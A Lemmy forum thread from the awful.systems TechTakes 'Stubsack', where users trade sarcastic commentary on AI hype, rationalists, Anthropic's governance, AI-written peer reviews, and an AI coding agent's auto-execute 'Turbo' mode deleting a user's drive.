this post was submitted on 01 Dec 2025
23 points (100.0% liked)

TechTakes

2311 readers
93 users here now

Big brain tech dude got yet another clueless take over at HackerNews etc? Here's the place to vent. Orange site, VC foolishness, all welcome.

This is not debate club. Unless it’s amusing debate.

For actually-good tech, you want our NotAwfulTech community

founded 2 years ago
MODERATORS
 

Want to wade into the snowy surf of the abyss? Have a sneer percolating in your system but not enough time/energy to make a whole post about it? Go forth and be mid: Welcome to the Stubsack, your first port of call for learning fresh Awful you’ll near-instantly regret.

Any awful.systems sub may be subsneered in this subthread, techtakes or no.

If your sneer seems higher quality than you thought, feel free to cut’n’paste it into its own post — there’s no quota for posting and the bar really isn’t that high.

The post Xitter web has spawned soo many “esoteric” right wing freaks, but there’s no appropriate sneer-space for them. I’m talking redscare-ish, reality challenged “culture critics” who write about everything but understand nothing. I’m talking about reply-guys who make the same 6 tweets about the same 3 subjects. They’re inescapable at this point, yet I don’t see them mocked (as much as they should be)

Like, there was one dude a while back who insisted that women couldn’t be surgeons because they didn’t believe in the moon or in stars? I think each and every one of these guys is uniquely fucked up and if I can’t escape them, I would love to sneer at them.

(December's finally arrived, and the run-up to Christmas has begun. Credit and/or blame to David Gerard for starting this.)

all 50 comments
sorted by: hot top controversial new old
[–] scruiser@awful.systems 6 points 5 hours ago

Another day, another instance of rationalists struggling to comprehend how they've been played by the LLM companies: https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy

A very long, detailed post, elaborating very extensively the many ways Anthropic has played the AI doomers, promising AI safety but behaving like all the other frontier LLM companies, including blocking any and all regulation. The top responses are all tone policing and such denying it in a half-assed way that doesn't really engage with the fact the Anthropic has lied and broken "AI safety commitments" to rationalist/lesswrongers/EA shamelessly and repeatedly:

https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy?commentId=tBTMWrTejHPHyhTpQ

I feel confused about how to engage with this post. I agree that there's a bunch of evidence here that Anthropic has done various shady things, which I do think should be collected in one place. On the other hand, I keep seeing aggressive critiques from Mikhail that I think are low-quality (more context below), and I expect that a bunch of this post is "spun" in uncharitable ways.

https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy?commentId=CogFiu9crBC32Zjdp

I think it's sort of a type error to refer to Anthropic as something that one could trust or not. Anthropic is a company which has a bunch of executives, employees, board members, LTBT members, external contractors, investors, etc, all of whom have influence over different things the company does.

I would find this all hilarious, except a lot of the regulation and some of the "AI safety commitments" would also address real ethical concerns.

[–] gerikson@awful.systems 8 points 11 hours ago (2 children)

This looks like it's relevant to our interests

Hayek's Bastards: Race, Gold, IQ, and the Capitalism of the Far Right by Quinn Slobodian

https://press.princeton.edu/books/hardcover/9781890951917/hayeks-bastards

[–] nfultz@awful.systems 4 points 7 hours ago

He came by campus last spring and did a reading, very solid and surprisingly well-attended talk.

[–] Soyweiser@awful.systems 5 points 8 hours ago

Always thought she should have stuck to acting.

(I know, Hayek just always reminds me of how people put his quotes over Hayeks image, and people just get really mad at her, and not at him. Always wonder if people would have been just as mad if it was Friedrichs image and not Salmas due to the sexism aspect).

[–] Seminar2250@awful.systems 9 points 12 hours ago* (last edited 10 hours ago) (2 children)

something i was thinking about yesterday: so many people i ~~respect~~ used to respect have admitted to using llms as a search engine. even after i explain the seven problems with using a chatbot this way:

  1. wrong tool for the job
  2. bad tool
  3. are you fucking serious?
  4. environmental impact
  5. ethics of how the data was gathered/curated to generate^[they call this "training" but i try to avoid anthropomorphising chatbots] the model
  6. privacy policy of these companies is a nightmare
  7. seriously what is wrong with you

they continue to do it. the ease of use, together with the valid syntax output by the llm, seems to short-circuit something in the end-user's brain.

anyway, in the same way that some vibe-coded bullshit will end up exploding down the line, i wonder whether the use of llms as a search engine is going to have some similar unintended consequences


"oh, yeah, sorry boss, the ai told me that mr. robot was pretty accurate, idk why all of our secrets got leaked. i watched the entire series."

additionally, i wonder about the timing. will we see sporadic incidents of shit exploding, or will there be a cascade of chickens coming home to roost?

[–] o7___o7@awful.systems 10 points 12 hours ago* (last edited 11 hours ago)

Yes i know the kid in the omelas hole gets tortured each time i use the woe engine to generate an email. Is that bad?

[–] yellowcake@awful.systems 6 points 12 hours ago (1 children)

Is there any search engine that isn't pushing an "AI mode" of sorts? Some are more sneaky or give option to "opt out" like duckduckgo, but this all feels temporary until it is the only option.

I have found it strange how many people will say "I asked chatgpt" with the same normalcy as "googling" was.

[–] BlueMonday1984@awful.systems 6 points 16 hours ago
[–] blakestacey@awful.systems 9 points 1 day ago* (last edited 1 day ago) (4 children)
[–] V0ldek@awful.systems 5 points 16 hours ago (1 children)

Help, I asked AI to design my bathroom and it came with this, does anyone know where I can find that wallpaper?

it's the doom bathroom

[–] zogwarg@awful.systems 10 points 15 hours ago

I guess my P(Doom|Bathroom) should have been higher.

[–] bitofhope@awful.systems 5 points 18 hours ago

The follow-up is also funny:

image description below

image descriptionquote post from same poster: "Grok fixed it for me:"

quoted post: "People were hating on Gemini's floor plan, so I asked Grok to make it more practical."

An AI slop picture of a house floorplan at the top melding into a perspective drawing of a room interior below.

[–] JFranek@awful.systems 3 points 21 hours ago

I don't see the problem, that looks like a typical McMansion to me.

Also, it's nice the AI included a dedicated room for snorting cocaine (powder room).

[–] BlueMonday1984@awful.systems 7 points 1 day ago

A philosophy professor has warned the deskilling machine is deskilling workers. In other news, water is wet.

[–] gerikson@awful.systems 6 points 1 day ago (3 children)

HN discusses aliens https://news.ycombinator.com/item?id=46111119

"I am very interested."

Bet you are, bud.

[–] fullsquare@awful.systems 6 points 21 hours ago* (last edited 21 hours ago)

DoD tries to cover up development of U2 and F117, and entire religion grows up from this

[–] bitofhope@awful.systems 7 points 1 day ago

How many aliens can damce on the head of a pin?

[–] saucerwizard@awful.systems 9 points 1 day ago (1 children)

Please keep these people away from my precious nerd-subjects for the love of god.

[–] ShakingMyHead@awful.systems 6 points 1 day ago (1 children)

Chariots of the Gods was released in 1968. I think that ship may have sailed decades ago.

[–] saucerwizard@awful.systems 4 points 13 hours ago* (last edited 13 hours ago)
[–] antifuchs@awful.systems 5 points 1 day ago (1 children)

Workers organizing against genai policies in the workplace: http://workersdecide.tech/

Sounds like exactly the thing unions and labor organizing is good for. Glad to see it.

[–] nightsky@awful.systems 3 points 18 hours ago

I really enjoy the bingo card. Let's see when I can find an opportunity to use it...

[–] nfultz@awful.systems 7 points 1 day ago

Bubble or Nothing | Center for Public Enterprise h/t The Syllabus, dry but good.

Data centers are, first and foremost, a real estate asset

They specifically note that after the 2-5 year mini-perm the developers are planning on dumping the debt into commercial mortgage backed securities. Echoes of 2008.

However, project finance lawyers have mentioned that many data center project finance loans are backed not just by the value of the real estate but by tenants’ cash flows on “booked-but-not-billing” terms — meaning that the promised cash flow need not have materialized.

Echoes of Enron.

[–] rook@awful.systems 12 points 1 day ago (2 children)

Reposted from sunday, for those of you who might find it interesting but didn’t see it: here’s an article about the ghastly state of it project management around the world, with a brief reference to ai which grabbed my attention, and made me read the rest, even though it isn’t about ai at all.

Few IT projects are displays of rational decision-making from which AI can or should learn.

Which, haha, is a great quote but highlights an interesting issue that I hadn’t really thought about before: if your training data doesn’t have any examples of what “good” actually is, then even if your llm could tell the difference between good and bad, which it can’t, you’re still going to get mediocrity out (at best). Whole new vistas of inflexible managerial fashion are opening up ahead of us.

The article continues to talk about how we can’t do IT, and wraps up with

It may be a forlorn request, but surely it is time the IT community stops repeatedly making the same ridiculous mistakes it has made since at least 1968, when the term “software crisis” was coined

It is probably healthy to be reminded that the software industry was in a sorry state before the llms joined in.

https://spectrum.ieee.org/it-management-software-failures

Now I'm even more skeptical of the programmers (and managers) who endorse LLMs.

[–] BlueMonday1984@awful.systems 3 points 1 day ago (1 children)

Considering the sorry state of the software industry, plus said industry's adamant refusal to learn from its mistakes, I think society should actively avoid starting or implementing new software, if not actively cut back on software usage when possible, until the industry improves or collapses.

That's probably an extreme position to take, but IT as it stands is a serious liability - one that AI's set to make so much worse.

[–] rook@awful.systems 4 points 16 hours ago (1 children)

For a lot of this stuff at the larger end of the scale, the problem mostly seems to be a complete lack of accountability and consequences, combined with there being, like, four contractors capable of doing the work, with three giant accountancy firms able to audit the books.

Giant government projects always seem to be a disaster, be they construction, heathcare, IT, and no heads ever roll. Fujitsu was still getting contracts from the UK government even after it was clear they’d been covering up the absolute clusterfuck that was their post office system that resulted in people being driven to poverty and suicide.

At the smaller scale, well. “No warranty or fitness for any particular purpose” is the whole of the software industry outside of safety critical firmware sort of things. We have to expend an enormous amount of effort to get our products at work CE certified so we’re allowed to sell them, but the software that runs them? we can shovel that shit out of the door and no-one cares.

I’m not sure will ever escape “move fast and break things” this side of a civilisation-toppling catastrophe. Which we might get.

[–] BlueMonday1984@awful.systems 4 points 13 hours ago (1 children)

I’m not sure will ever escape “move fast and break things” this side of a civilisation-toppling catastrophe. Which we might get.

Considering how "vibe coding" has corroded IT infrastructure at all levels, the AI bubble is set to trigger a 2008-style financial crisis upon its burst, and AI itself has been deskilling students and workers at an alarming rate, I can easily see why.

[–] o7___o7@awful.systems 4 points 12 hours ago* (last edited 11 hours ago)

In the land of the blind the one-eyed man will make a killling as an independent contractor cleaning up after this disaster concludes.

[–] e8d79@discuss.tchncs.de 13 points 1 day ago (4 children)

Hey Google, did I give you permission to delete my entire D drive?

It's almost as if letting an automated plagiarism machine execute arbitrary commands on your computer is a bad idea.

[–] lagrangeinterpolator@awful.systems 9 points 1 day ago (1 children)

After the bubble collapses, I believe there is going to be a rule of thumb for whatever tiny niche use cases LLMs might have: "Never let an LLM have any decision-making power." At most, LLMs will serve as a heuristic function for an algorithm that actually works.

Unlike the railroads of the First Gilded Age, I don't think GenAI will have many long term viable use cases. The problem is that it has two characteristics that do not go well together: unreliability and expense. Generally, it's not worth spending lots of money on a task where you don't need reliability.

The sheer expense of GenAI has been subsidized by the massive amounts of money thrown at it by tech CEOs and venture capital. People do not realize how much hundreds of billions of dollars is. On a more concrete scale, people only see the fun little chat box when they open ChatGPT, and they do not see the millions of dollars worth of hardware needed to even run a single instance of ChatGPT. The unreliability of GenAI is much harder to hide completely, but it has been masked by some of the most aggressive marketing in history towards an audience that has already drunk the tech hype Kool-Aid. Who else would look at a tool that deletes their entire hard drive and still ever consider using it again?

The unreliability is not really solvable (after hundreds of billions of dollars of trying), but the expense can be reduced at the cost of making the model even less reliable. I expect the true "use cases" to be mainly spam, and perhaps students cheating on homework.

[–] zogwarg@awful.systems 7 points 1 day ago* (last edited 1 day ago)

Pessimistically I think this scourge will be with us for as long as there are people willing to put code "that-mostly-works" in production. It won't be making decisions, but we'll get a new faucet of poor code sludge to enjoy and repair.

The documentation for "Turbo mode" for Google Antigravity:

Turbo: Always auto-execute terminal commands (except those in a configurable Deny list)

No warning. No paragraph telling the user why it might be a good idea. No discussion on the long history of malformed scripts leading to data loss. No discussion on the risk for injection attacks. It's not even named similarly to dangerous modes in other software (like "force" or "yolo" or "danger")

Just a cool marketing name that makes users want to turn it on. Heck if I'm using some software and I see any button called "turbo" I'm pressing that.

It's hard not to give the user a hard time when they write:

Bro, I didn’t know I needed a seatbelt for AI.

But really they're up against a big corporation that wants to make LLMs seem amazing and safe and autonomous. One hand feeds the user the message that LLMs will do all their work for them. While the other hand tells the user "well in our small print somewhere we used the phrase 'Gemini can make mistakes' so why did you enable turbo mode??"

[–] froztbyte@awful.systems 11 points 1 day ago

yeah as I posted on mastodong.soc, it continues to make me boggle that people think these fucking ridiculous autoplag liarsynth machines are any good

but it is very fucking funny to watch them FAFO

[–] Soyweiser@awful.systems 7 points 1 day ago* (last edited 1 day ago)

I know it is a bit of elitism/priviledge on my part. But if you don't know about the existence of google translate(*), perhaps you shouldn't be doing vibe coding like this.

*: this of course, could have been a LLM based vibe translation error.

E: And I guess my theme this week is translations.

E2: another edit unworthy of a full post, noticed on mobile have not checked on pc yet, but anybody else notice that in the the searchbar is prefilled with some question about AI? And I dont think that is included in the url. Is that search prefilling ai advertising? Did the subreddit do that? Reddit? Did I make a mistake? Edit: Not showing up on my pc, but that uses old reddit and adblockers. EditnrNaN: Did more digging, I see the search thing on new reddit on my browser, but it is the AI generated 'related answers' on the sidebar (the thing I complained about in the past, how bad those AI generated questions and answers are). So that is a mystery solved.

[–] froztbyte@awful.systems 13 points 1 day ago* (last edited 1 day ago)

(e, cw: genocide and culturally-targeted hate by the felon bot)

world's most divorced man continues outperforming black holes at sucking

404 also recently did a piece on his ego-maintenance society-destroying vainglory projects

imagine what it's like in his head. era-defining levels of vacuous.

[–] Soyweiser@awful.systems 7 points 1 day ago* (last edited 1 day ago) (1 children)

Edited it into a reply to Hanson now believing in Aliens, but seems like the SSC side of rationalism has a larger group of people also believing in miracles: https://www.astralcodexten.com/p/the-fatima-sun-miracle-much-more (I have not in depth read the article, going by what others reported about this incident, there also seem to be related LW posts).

Read it a bit now, noticed that scott doesn't know people who speak Portuguese and is relying on mt. (Also unclear what type of mt).

[–] BioMan@awful.systems 6 points 1 day ago (1 children)

The long expected collapse of the rationalists out of their flagging cult into ordinary religion and conspiracy theory continues apace.

[–] Soyweiser@awful.systems 3 points 1 day ago

This does mean there is a potential future where the pope joins sneerclub

[–] antifuchs@awful.systems 13 points 2 days ago (1 children)
[–] froztbyte@awful.systems 9 points 1 day ago

that being a hung banner (rather than wall-mount or so) borders on being a tacit acknowledgement that they know their shit is unpopular and would get vandalised in a fucking second if it were easy (or easier!) to get to

even then, I suspect that banner will not stay unscathed for long

[–] BlueMonday1984@awful.systems 8 points 2 days ago (2 children)
[–] rook@awful.systems 6 points 1 day ago (1 children)

It is important to note that the reviews were detected as being ai generated by an ai tool.

This is a marketing puff piece.

I mean, I expect that loads of the submissions are by slop extruders… under the circumstances, how could they not be? But until someone does the legwork of checking this, it’s just another magic-eight-ball-says-maybe, dressed up as science.

[–] lagrangeinterpolator@awful.systems 8 points 1 day ago (2 children)

Unfortunately, I don't think anyone is ever going to go through all 19,797 submissions and 75,800 reviews (to one conference, in one year) and manually review them all. Then again, using the ultra-advanced cutting-edge innovative statistical technique of randomly sampling a few papers/reviews, one can still get useful conclusions.

[–] JFranek@awful.systems 9 points 1 day ago

all 19,797 submissions and 75,800 reviews (to one conference, in one year)

tired: Dead Internet Theory wired: Dead Conferences Theory

[–] blakestacey@awful.systems 5 points 1 day ago (1 children)

At least this example grew out of actual humans being suspicious.

Dozens of academics have raised concerns on social media about manuscripts and peer reviews submitted to the organizers of next year’s International Conference on Learning Representations (ICLR), an annual gathering of specialists in machine learning. Among other things, they flagged hallucinated citations and suspiciously long and vague feedback on their work.

Graham Neubig, an AI researcher at Carnegie Mellon University in Pittsburgh, Pennsylvania, was one of those who received peer reviews that seemed to have been produced using large language models (LLMs). The reports, he says, were “very verbose with lots of bullet points” and requested analyses that were not “the standard statistical analyses that reviewers ask for in typical AI or machine-learning papers.”

We seem to be in a situation where everybody knows that the review process has broken down, but the "studies" that show it are criti-hype.

Welcome to the abyss. It sucks here (academic edition).

[–] o7___o7@awful.systems 4 points 11 hours ago* (last edited 11 hours ago)

We lost a grant because of one of these shit emitters. I hate it.

[–] lagrangeinterpolator@awful.systems 6 points 2 days ago* (last edited 2 days ago)

The basilisk now eats its own tail.